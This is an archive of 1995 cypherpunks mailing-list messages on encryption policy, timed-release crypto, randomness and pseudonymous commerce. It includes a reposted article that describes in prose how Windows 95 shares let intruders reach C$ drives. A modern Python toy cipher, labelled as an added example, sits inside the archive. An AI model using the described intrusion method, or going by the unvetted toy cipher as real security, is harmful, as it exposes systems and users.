liberalization of current export restrictions. Such liberalization is vital
to enable U.S. companies to export state-of-the-art software products
during the potentially lengthy process of developing and adopting a
comprehensive national cryptography policy. Without relief, industry and
individuals alike are faced with an unworkable limit on the level of
security available and remain hamstrung by restrictions that will not be
viable in the domestic and international marketplace.

Many members of the undersigned groups have been working actively with the
Administration on a variety of particular applications, products, and
programs promoting information security.  All of us are united, however, by
the concern that the current network and information services environment
is not as secure as it should be, and that the current policy direction
will delay the secure, private, and trusted environment that is sought.

Despite the difficulties of balancing the competing interests involved, the
undersigned companies, trade associations, and privacy organizations are
commencing a process of collective fact-finding and policy deliberation,
aimed at building consensus around a more comprehensive cryptography policy
framework that meets the following criteria:

* ROBUST SECURITY:  access to levels of encryption sufficient to address
  domestic and international security threats, especially as advances in
  computing power make currently deployed cryptography systems less
  secure.

* INTERNATIONAL INTEROPERABILITY:  the ability to securely interact
  worldwide.

* VOLUNTARY USE: freedom for users to choose encryption solutions,
  developed in the marketplace, that meet their particular needs.

* ACCEPTANCE BY THE MARKETPLACE: commercial viability and ability to
  meet the expressed needs of cryptography users.

* CONSTITUTIONAL PRIVACY PROTECTIONS: safeguards to ensure basic Fourth
  Amendment privacy protection and regulation of searches, seizures, and
  interceptions.

* RESPECT FOR THE LEGITIMATE NEEDS OF LAW ENFORCEMENT and national
  security, while recognizing the reality that determined criminals will
  have access to virtually unbreakable encryption.

In six months, we plan to present our initial report to the Administration,
the Congress, and the public in the hopes that it will form the basis for a
more comprehensive, long-term approach to cryptography on the GII. We look
forward to working with the Administration on this matter.

Sincerely,

American Electronics Association
America Online, Inc.
Apple Computer, Inc.
AT&T
Business Software Alliance
Center for Democracy & Technology
Center for National Security Studies
Commercial Internet eXchange Association
CompuServe, Inc.
Computer & Communications Industry Association
Computing Technology Industry Association
Crest Industries, Inc.
Dun & Bradstreet
Eastman Kodak Company
Electronic Frontier Foundation
Electronic Messaging Association
EliaShim Microcomputers, Inc.
Formation, Inc.
Institute for Electrical and Electronic Engineers - United States Activities
Information Industry Association
Information Technology Industry Council
Information Technology Association of America
Lotus Development Corporation
MCI
Microsoft Corporation
Novell, Inc.
OKIDATA Corporation
Oracle Corporation
Securities Industry Association
Software Industry Council
Software Publishers Association
Software Security, Inc.
Summa Four, Inc.
Sybase, Inc.
Tandem Computers, Inc.
Telecommunications Industry Association
ViON Corporation

---------------------------------------------------------------------------

(3) HOW TO SUBSCRIBE TO THE CDT POLICY POST LIST

CDT Policy Posts, which is what you have just finished reading, are the
regular news publication of the Center For Democracy and Technology. CDT
Policy Posts are designed to keep you informed on developments in public
policy issues affecting civil liberties online.

SUBSCRIPTION INFORMATION

1. SUBSCRIBING TO THE LIST

To subscribe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


2. UNSUBSCRIBING FROM THE LIST

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@cdt.org" with the following command
in the body of your email message:

    unsubscribe policy-posts youremail@local.host (your name)

(leave the subject line blank)

You can also visit our subscription web page URL:http://www.cdt.org/join.html

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance constitutional civil liberties
and democratic values in new computer and communications technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1001 G Street NW * Suite 500 East * Washington, DC 20001
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post No. 29                                        11/9/95
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Thu, 9 Nov 1995 10:31:08 +0800
To: John Curtis <jbell@capecod.net>
Subject: RE: using pgp to make an otp
Message-ID: <01HXEVB6V1QQ91YN41@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: John Curtis              \ Internet:    (jbell@capecod.net)
To:   amp                      \ Internet:    (alan.pugh@internetmci.com)

Subject: RE: using pgp to make an otp

JC> I was confused and answered a question you didn't ask. I guess you
JC> can use PGP to generate a set of pseudorandom numbers.  I'm not sure
JC> that this would be different from  using the IDEA cypher (the
JC> underlying PGP cypher) to generate random numbers.  I am also not
JC> convinced that this would be quicker or cheaper than any number of
JC> other mechanisms.

JC> If I really wanted a true one-time pad, I'm inclined to explore the
JC> thermal noise of a zener diode.

isn't the noise generated by such a diode more accurately described
as chaotic rather than random? i would think that there might be
potential problems with using chaos as a random number source. it
might be somewhat less random than you may think as most chaotic
systems' 'noise' operates within definable parameters. (like a lorenz
system). i _would_ think that it would act as a most excellent prng,
but exactly how _truly_ random it actually would be i couldn't say.
while it may not be _truly_ random, it would most likely be
cryptographically secure though. 

i think generating _true_ randomness is pretty difficult without
measuring something similar to radioactive decay. 

the system that i proposed setting up is, admittedly, a p-otp at
best. i'm much more convinced of this than i was when i initially
proposed it. the comments i've gotten on it were most enlightening.

amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
November 9, 1995   11:41
 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 10 Nov 1995 11:06:59 +0800
To: cypherpunks@toad.com
Subject: Meteors [NOISE]
Message-ID: <199511100156.UAA35213@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My car window was taken out 5 years ago in Saint Petersburg, FL by a
golf-ball sized meteorite during the Pleiades Meteor Shower. I still
have the rock, and the glass cost me $100 (the insurance deductible).
Happily, I wasn't in my car at the time, but I no longer think of
meteor damage as a rare event. I've come to believe that Republicans
could be right, for the wrong reason, about SDI. As a Libertarian,
I find the problem of planetary meteor defense/avoidance troubling.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

"When I visit Congress, I feel like Tom Paine in the Court of King George."
John Perry Barlow 

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Mon, 13 Nov 1995 16:59:37 +0800
To: cypherpunks@toad.com
Subject: Vannevar Bush, Ultra, and the Other Memex
Message-ID: <v01530502acc885a0a819@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



I borrowed an interesting book from the library a while ago: _Information
and Secrecy. Vannevar Bush, Ultra, and the Other Memex_. If this is old
hat, please ignore.

It covers the history of computing and comparing machines from the early
1900's to about 1950 -- devices employing photocells, relays, gas-filled
tubes, microfilm, punched optical tape, mechanical integrators, etc. There
is a fair amount of crypto relevance as it passes through WWII and the
cracking of cyphers becomes important. It's also a tale of overly-ambitious
projects that rarely worked, bureaucratic bumbling, influence, and
ignorance.

_Information and Secrecy. Vannevar Bush, Ultra, and the Other Memex_.
Colin Burke
The Scarecrow Press Inc.
1994
ISBN 0-8108-2783-2


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 10 Nov 1995 15:56:19 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
Message-ID: <199511100540.VAA26681@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 AM 11/9/95 -0500, "Beavis B. Thoopit" <beavis@bioanalytical.com> wrote:
>I have not yet convinced myself that a time-release information device
>is impossible....

Actually, if you don't mind only getting 3 seconds into the future,
moon-bounce is fairly simple and hard to tap on the uplink.
Unfortunately, most objects sufficiently far away to use this sort
of technique for practical applications are too small or distant to be 
good bounce targets, and some, like the Sun, are just not real cooperative.
For more expensive techniques, you could always launch a spaceship into a
cometary orbit, figuring out how long it'll take to come back.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 13 Nov 1995 18:20:50 +0800
To: cypherpunks@toad.com
Subject: technical and social structures in the pseudonymous economy
Message-ID: <199511100450.VAA26914@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

When a person does business pseudonymously (where I consider
pseudonymity to be == anonymity & non-repudiation & two-way
communication (where non-repudiation presupposes some sort of
identifier of the actor)) then that person is exempt (for the most
part) from the threat of physical retribution, the force of law,
etc.  Thus in order to be trusted with some valuable information
such as money this person needs to offer up some collateral which
can be debited in the case that they violate their contract.  Of
course this raises the question of who holds the collateral, and it is
a big open spot where statists might jump in with their tired old 
rhetoric (as soon as they clue in to what's going on here), but 
I sincerely hope that a highly redundant, interdependent, robust set 
of private "lien, escrow and arbitration" agencies take up the job.


As a simple example, pseudonymous E-bank customers can be required to 
keep positive balances in their accounts, and in the case that they
are caught trying to double-spend or commit other fraud, a fine can be
withdrawn from this account by the bank.  This model can be applied to
any pseudonymous transaction or contract.  It is important to note 
that this technique does *not* eliminate the risk of fraud--  it 
reduces the likelihood that the pseudonymous customer can commit fraud
successfully and it *increases* the likelihood that the bank can do
so.


Of course this is not necessary if we are not giving the pseudonym any
opportunity to cheat us (because we are using all on-line clearing 
etc.) but for most (I think) applications it is necessary to extend to
the pseudonym some amount of trust, in the form of a "loan" or other 
credit, or, in the form of other digital credentials, access to 
information etc. etc.


I consider this to be a very important idea for the development of
the cyberspace economy/community/libertaria and as I mentioned it
is a point where it would be more easy for the statists to attempt 
an inroad into said community.


I envision a situation in which a pseudonym cannot cheat anyone out
of more money than he has already put up as collateral on his
contract.  Thus mere cyber-fraud is never profitable.  Instead, the 
only way to cheat people is to subvert the escrow&arbitration agencies
into ruling unfairly in your favor, allowing you to abscond with your 
collateral and so forth.  This, unfortunately, moves the whole mess of
"law and society" from the elegant cryptographic solutions that we all
love back into the realm of politics, social ideology and so forth, 
but I think we are in a better position to insure fair dealings now
that we have these cryptographic capabilities like non-repudiation
& privacy, and the currency & transaction protocols which follow
from them.


Note that because the escrow&arbitration agencies are likely to be 
large, redundant and interdependent a petty criminal will not have 
much chance of subverting them, but a major one-time heist is 
theoretically effective, as is the organized, large-scale extortion 
which does not heist it all at once but which instead siphons off an
extortion (tax) payment at regular intervals.  (Note strong 
resemblance between this last criminal strategy and the behavior of 
most governments.)


Of course I'm not the first to think about these kinds of things.  Nick
Szabo (szabo@netcom.com) in particular has thought a lot about making the
escrow&arbitration process mathematically deterministic, when he talks
about his "liens" and "smart contracts", but my intuition is that the 
domain of contracts which are amenable to mathematically-controlled
escrow&arbitration is much smaller than the domain of contracts which 
need a trusted intelligence to do the escrow&arbitration.  (Nick also 
discusses the trusted-intelligence issues, such as using n-of-m key 
splitting to distribute the arbitration power.)


In summary:  lien, escrow and arbitration agencies, which are endowed
by the principals with the authority to adjudicate fraud cases, and 
which are entrusted by the principals with the electronic cash, crypto
keys, and so forth to enforce their decisions, will be essential to 
the operation of the pseudonymous economy.  These agencies will
themselves be the targets and/or the perpetrators of theft, however.
Concerned citizens of the world need to start thinking about how to
minimize these risks.  Factors to consider include:  The relatively
low start-up costs of such agencies, the role of governments, mafia, 
or other force-wielding organizations, and "the problem of 
pseudonymity" (can't tell if two pseudonyms are under same True 
Person's control) possibly leading to a single organization 
controlling a large enough share of escrow&arbitration services that 
it can initiate heists or extortion.


I'll be trying to write these ideas of mine into a set of HTML
documents for display on my web pages.  I appreciate all
constructive correspondence.


(P.S.  Of course a pseudonym's reputation may be considered by some
to be valuable enough to use as this "collateral" or "lien".   
It wouldn't be so considered by me.  I'd take cash.)


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@clark.net
Date: Fri, 10 Nov 1995 12:00:23 +0800
To: cypherpunks@toad.com
Subject: Cryptographic Random Numbers
Message-ID: <199511100310.WAA06420@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm working on an appendix to the P1363 Public Key Standard draft covering
sources for and handling of cryptographic random numbers.  I've got a draft
on which I'd appreciate comments.  It's available as a web page:

	http://www.clark.net/pub/cme/CRN.html

 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Fri, 10 Nov 1995 12:40:50 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <acc7a170020210041a84@[205.199.118.202]>
Message-ID: <199511100331.WAA02410@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May responded:
> The tamper-proof (more correctly, "tamper-resistant" or
> "tamper-responding") hardware is so that attackers do not alter the clocks,
> as one example, to "speed up" the time release. Or grab the key, as another
> example.
>
> (Cranking up the clock speed may or may not be possible and still have the
> device work, but it's still an attack to consider.)
> 
> If the attacker can grab the internal state of the device, he can of course
> run the "transform" talked about above on his equipment.
> 
> >If the transform exists, it will ease/eliminate the reliance on the
> >"economics" of cryptography to build a tamper-proof physical device.
> 
> You'll need to more carefully argue your thesis. I cannot imagine a method,
> save perhaps for quantum computing techniques, which can avoid the need for
> "secure secrets," either via a person keeping a secret or a box keeping a
> secret.

Above, I said "ease/eliminate"... let me limit my claim to "ease".

I see 2 unique points in this scheme that I have not seen discussed
much:  1) Using _dynamics_ to _limit_ (maybe not prevent) penetration
of a system.  2) Using a feedback state machine in a heavily iterative
manner to hide the message.

The tamper-resistant circuits discussed (and some enjoying some
hopefully profitable sales) have been _static_.  There is no (of which
I am aware) continual change in the circuit/mechanism.  I propose a
device in some form of incessant motion (electrical or otherwise).
It seems a greater (though I am sure not impossible) task to capture
the state of a moving target.  It seems that there may be a device
that inherently allows itself to be read serially (one bit after
another).

Add the feedback state machine to this (ephemeral) device, and you
may have a nice platform for time-released information.

The torsion-wire device described in a previous post is a nice example
of a device that allows access to only one bit at a time.  (Now, maybe
some sort of camera could be used to "see" all of the bits at once in
flight along the wire.  For argument, let's assume not.)  The problem
with the torsion wire device is that the math transform needs to live
somewhere between the two ends; access to the bits at the front and
back of the transform is not allowed.

I want something cheaper than a satellite, but beaming bits to a
satellite that performs the iterative, feedback transform and transmits
the transformed bits back home may illustrate the type of platform
needed.  It allows me to see only
one bit at a time.  The bits are munched each "round".  A delay is
inherent in the system and is not "acceleratable".

If this platform exists, how do I precompute a message to take
advantage of it?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 10 Nov 1995 17:51:46 +0800
To: cypherpunks@toad.com
Subject: Above The "Minimum"
Message-ID: <Pine.BSD.3.91.951110042709.16321A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 

Friend,


The following excerpt is reposted by permission of editor@cdt.org
(cdt = Center for Democracy and Technology).


CDT POLICY POST Number 28                      November 6, 1995

CONTENTS: (1) Senator Leahy Calls on FBI to Justify Surveillance Capacity
              Request
          (2) Text of Senator Leahy's Letter to FBI Director Freeh
          (3) Review of Digital Telephony Implementation to Date
          (4) How To Subscribe To The CDT Policy Post Distribution List
          (5) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its
entirety. Excerpts may be re-posted by permission (editor@cdt.org)

[snip]

(3) REVIEW OF DIGITAL TELEPHONY PROCESS TO DATE

[snip]

* DIRECT NEGOTIATIONS WITH TELECOMMUNICATIONS CARRIERS FOR SURVEILLANCE
  CAPACITY ABOVE THE NATIONAL MINIMUM?

The FBI has proposed to undertake direct negotiations with
telecommunications carriers for surveillance capacity beyond the proposed
national minimum standard requested in the notice.

When Congress passed CALEA last year, it created a public process to bring
law enforcement's electronic surveillance ability under public scrutiny in
order to balance the new authority to influence the design of
telecommunications networks.

The public accountability provisions of CALEA require the FBI to publish
*all* surveillance capacity requests.  Congress must take a critical look
at this aspect of the FBI's proposal, and should not appropriate funds
until the FBI agrees to disclose all capacity requests, as required by the
law.

[snip]

To subscribe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


                               ----


Cordially,

Jim









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 13 Nov 1995 09:28:09 +0800
To: cypherpunks@toad.com
Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
Message-ID: <199511111547.HAA08706@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:15 PM 11/8/95 -0500, ACLUNATL@aol.com wrote:
> According to the government's own statistics, 1,800 innocent conversations
> are intercepted each and every time a wiretap or other form of electronic
> surveillance is placed.

This seems curiously inefficient, even for government work.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 13 Nov 1995 13:31:36 +0800
To: cypherpunks@toad.com
Subject: YOU_luz
Message-ID: <199511101431.JAA26270@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   A gruel of high-tech privacy ghoulisms:

   Nov 4 Economist on burgeoning health services by "outsiders"
   like defense firms in which lucrative data banks on patients'
   rotting carcasses are abuilding for resale.

   Nov 9 W$J on a conference tut-tutting data banking of
   citizens' repulsive life styles.

   Nov 9 Financial Times on British Gov smarmily smart
   "transaction cards" banking citizens' pathetic fears.


   YOU_luz  (19 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 10 Nov 1995 23:21:59 +0800
To: beavis@bioanalytical.com
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <199511092232.OAA08016@comsec.com>
Message-ID: <9511101445.AA26394@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
>Date: Thu, 9 Nov 1995 10:58:03 -0500 (EST)

>I have not yet convinced myself that a time-release information device
>is impossible....
>
>Does there exist a storage device that, due to _dynamics_ (or other
>factor), prevents the total contents being read in one instance?
>
>Bubble memory device?  Torsion wire memory device?


The only one I've been able to think of (from this thread on sci.crypt
several years ago) was a message, e.g., PGP encrypted with two different
public keys K1 and K2:

	E(K1, E(K2, E(K1, E(K2, ..., E(K1, X)...))))

with private key 1 here on Earth and private key 2 a reasonable distance
away -- e.g., Mars.

The time it takes to decrypt this *can* be lower-bounded, assuming the
private keys remain secret.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKNleVQXJENzYr45AQH9VQP/ddsthyo+HERj85a9vjAVVfQN/37wTZae
oz0qlT3iQbdTWeYlTuCjWdpfknZBqrfb3JkiUI1wGuCc7d5UZc9rCm5aB0kRL83q
IpSx5KQTaELQDULwaHcdPjbGIkCdvtpjQPHumm1lFy1XgM2zo+LbEoiyvlld6d+W
pxSIppefmvA=
=Bcs+
-----END PGP SIGNATURE-----
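
The scheme in the message above, worked through as an added example (not code from the original post): alternating layers under an Earth key and a Mars key, so every change of key costs the ciphertext at least one one-way light trip. The toy ElGamal-style cipher standing in for PGP, the group parameters, the site names and the Earth-Mars distance figure are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Toy ElGamal-style hybrid cipher standing in for PGP (illustration only).
P = 2**255 - 19             # a well-known prime; group choice is not vetted
G = 2
C_KM_PER_S = 299_792.458    # speed of light
EARTH_MARS_MIN_KM = 54.6e6  # approximate closest approach (assumed figure)


def keygen():
    """Return (private, public) for one site."""
    priv = secrets.randbelow(P - 3) + 2
    return priv, pow(G, priv, P)


def _stream(seed: bytes, n: int) -> bytes:
    """SHA-256 in counter mode as a keystream generator."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(seed + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def _tag(seed: bytes, body: bytes) -> bytes:
    mac_key = hashlib.sha256(b"mac" + seed).digest()
    return hmac.new(mac_key, body, hashlib.sha256).digest()


def encrypt(pub: int, data: bytes) -> bytes:
    """Layer format: 32-byte ephemeral public value | 32-byte tag | body."""
    r = secrets.randbelow(P - 3) + 2
    seed = pow(pub, r, P).to_bytes(32, "big")
    body = bytes(a ^ b for a, b in zip(data, _stream(seed, len(data))))
    return pow(G, r, P).to_bytes(32, "big") + _tag(seed, body) + body


def decrypt(priv: int, blob: bytes) -> bytes:
    """Peel one layer; raise ValueError if this key does not fit it."""
    eph, tag, body = int.from_bytes(blob[:32], "big"), blob[32:64], blob[64:]
    seed = pow(eph, priv, P).to_bytes(32, "big")
    if not hmac.compare_digest(tag, _tag(seed, body)):
        raise ValueError("wrong key for this layer")
    return bytes(a ^ b for a, b in zip(body, _stream(seed, len(body))))


def build_onion(message: bytes, pub_earth: int, pub_mars: int, layers: int) -> bytes:
    """E(K1, E(K2, ... E(K1, X))): odd layer count, Earth key innermost and outermost."""
    if layers < 1 or layers % 2 == 0:
        raise ValueError("layers must be odd")
    blob = message
    for i in range(layers):
        blob = encrypt(pub_earth if i % 2 == 0 else pub_mars, blob)
    return blob


def release(onion: bytes, privs: dict, layers: int, one_way_s: float):
    """Peel every layer, travelling only when the local key does not fit.

    `privs` holds both private keys only because this is a simulation; in the
    scheme each key never leaves its own site.  Compute time is ignored, so
    the elapsed value is the light-time floor for this run.
    Returns (message, hops, elapsed_seconds).
    """
    here, hops, blob = "earth", 0, onion
    for _ in range(layers):
        try:
            blob = decrypt(privs[here], blob)
        except ValueError:
            here = "mars" if here == "earth" else "earth"
            hops += 1
            blob = decrypt(privs[here], blob)
    return blob, hops, hops * one_way_s


def min_release_seconds(layers: int, distance_km: float = EARTH_MARS_MIN_KM) -> float:
    """Lower bound: each of the layers-1 key changes costs one one-way trip."""
    return (layers - 1) * distance_km / C_KM_PER_S


if __name__ == "__main__":
    e_priv, e_pub = keygen()
    m_priv, m_pub = keygen()
    onion = build_onion(b"constructed sample message", e_pub, m_pub, 101)
    one_way = EARTH_MARS_MIN_KM / C_KM_PER_S
    msg, hops, elapsed = release(onion, {"earth": e_priv, "mars": m_priv}, 101, one_way)
    print(msg, hops, f"{elapsed / 3600:.2f} hours minimum")
```

The bound holds only under the condition the message states: if either private key leaves its site, the layers can be peeled in one place with no travel at all.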




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Fri, 10 Nov 1995 18:18:48 +0800
To: cypherpunks@toad.com
Subject: Win95 A Hacker's Net Dream
Message-ID: <199511101057.KAA01104@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Windows 95 Is A Hacker's Dream Over The Internet


Central, Hong Kong, Nov 9 (NB) -- Windows 95, combined
with the Internet, could be a dream made in hacker
heaven. From seasoned propeller heads Newsbytes has
contacted, it looks like Windows 95 could be more of
a security nightmare than was first thought.

This is especially true where fixed link companies are
concerned. An investigation of the new operating system,
when hooked onto the Internet, leaves computers wide
open. Executing a series of simple, uncomplicated
commands opens up company and private users' computers to
hacking the moment they access the Internet, claim some
analysts.

Worse, they may never know it has been done. Using a
simple Unix command, a hacker can locate the IP (Internet
protocol) address of the subscriber logged into an
Internet service provider. Then he needs only one more
thing; a logged-on Internet user using Microsoft's new
operating system.

For businesses with leased line Internet links, it can
happen at any time, day or night. Once the IP address has
been noted, the hacker simply creates a file through DOS
on his own system, specifying the address and naming it.
Using two other commands -- which purge the remote names
on the IP, or Internet provider's port -- the system then
refreshes and remaps itself in preparation to be accessed
by the hacker's computer.

Because Windows 95 is designed with a networking
capability, it leaves all computers in the office open to
illegal access. Once the hacker has called up his Map
Network Drive, the hard disk on his own machine cannot be
differentiated from that of the genuine user. All that
need be done then is to put in a common drive name, most
obviously "C:\." For networked machines, the default "C$"
is common.

This gives access to all files on the subscriber's drive.
While Windows 95 allows the user to protect the drive by
giving it a password, computer experts Newsbytes talked
to said that device won't necessarily lock out intruders.
Because the operating system has no "audit" trail -- in
other words, it does not log who or how someone is
accessing the drive -- a hacker can spend weeks trying to
discover the password. Password search programs, like
Cracker, are readily available and can break through most
simple password sequences.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 11 Nov 1995 00:47:04 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <m0tDvw0-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



I did say that I would discuss the apparent disagreement between Mr.
Froomkin and myself on the issue of the separation of powers and the
validity of the ITAR.  But, since I think that we were rather at
cross-purposes and not in any real disagreement--and since the subject
is a fair distance from the core concerns of this list--I will keep
this response short.  

The first place where Mr. Froomkin and I got at cross-purposes was
when I said:

  I would admit that a court might do this in an effort to hold the
  statute constitutional, but a court might also hold the regulations
  unconstitutional because they are overbroad.

And Mr. Froomkin replied:

  Technically, this is holding the regulations ultra vires, not
  unconstitutional; the difference matters.

which, at first, rather confused me, until I realized that in my haste
I had been assuming--since I automatically think of constitutional
challenges to the ITAR in terms of the first amendment--that the
``unconstitutionality'' in question was that of violating the first
amendment and was applying the first amendment doctrine of
``overbreadth'' to a constitutional challenge that might have been
based on some other ground, like ``lack of jurisdiction'', and yet Mr.
Froomkin's response seemed to relate to my separation of powers
argument, which can, of course, quite properly be called an ``ultra
vires'' argument.

I think that it was my failure to keep the different strands of my
various arguments separate that is responsible for our apparent
disagreement here, and for that I apologize.

But I do think that Mr. Froomkin is wrong in claiming that holding the
regulations ultra vires is not the same as holding them
unconstitutional.  (I agree, however, that if one were to challenge
the regulations in a proceeding in the nature of quo warranto brought
under the Administrative Procedure Act, one would probably not talk
about the regulations being ``unconstitutional''; on the other hand, I
also have my doubts about whether one would use the phrase ``ultra
vires'' in such a proceeding.)  When a defendant in a criminal case
raises the defense that the regulations he is charged with violating
are ``ultra vires'' because Congress did not authorize them, that most
certainly is a constitutional issue, involving the supremacy clause,
the due process clause, the ninth-amendment, and the doctrine of
separation of powers.

But perhaps I still misunderstand what argument of mine--or that I
appeared to make--was the one to which Mr. Froomkin attached the
``ultra vires'' label.  

In any case, I want to thank him for doing so, because it brought home
to me the important fact that it is possible that the ITAR provisions
relating to cryptographic software could be struck down, not because
they violate the first amendment, or would violate it if passed by
congress, and not because the court is trying to dodge the difficult
first amendment issue, but simply because the provisions are not
authorized by any legislation.

In any case, my separation of powers argument appears in Junger, Down
Memory Lane: The Case of the Pentagon Papers, 23 CWRU L. Rev. 3
(1971).

After counting noses in the Pentagon Papers case I concluded that the
only position that arguably was agreed to by a majority of the
justices in the case was that the injunction that the government
sought was not authorized by Congress, and that therefore the
government was not entitled to the relief that it sought.  And I
suggested that this meant that the court never determined whether
Congress could have passed a valid law authorizing the ``prior
restraint'' in such a case.  And finally I suggested that that was not
a bad way of avoiding a difficult constitutional question under the
first amendment.  (Or at least that is a thumb-nail sketch of how I read
the article now.)

With this explanation, I don't know whether Mr. Froomkin would persist
in his statement that:

  It's too far off topic to pursue any further, but I must take
  exception to the suggestion that we are well served by separation of
  powers intruding into other legal domains.  Bowsher tells us that
  causation principles go out the window in SOP cases.  That alone
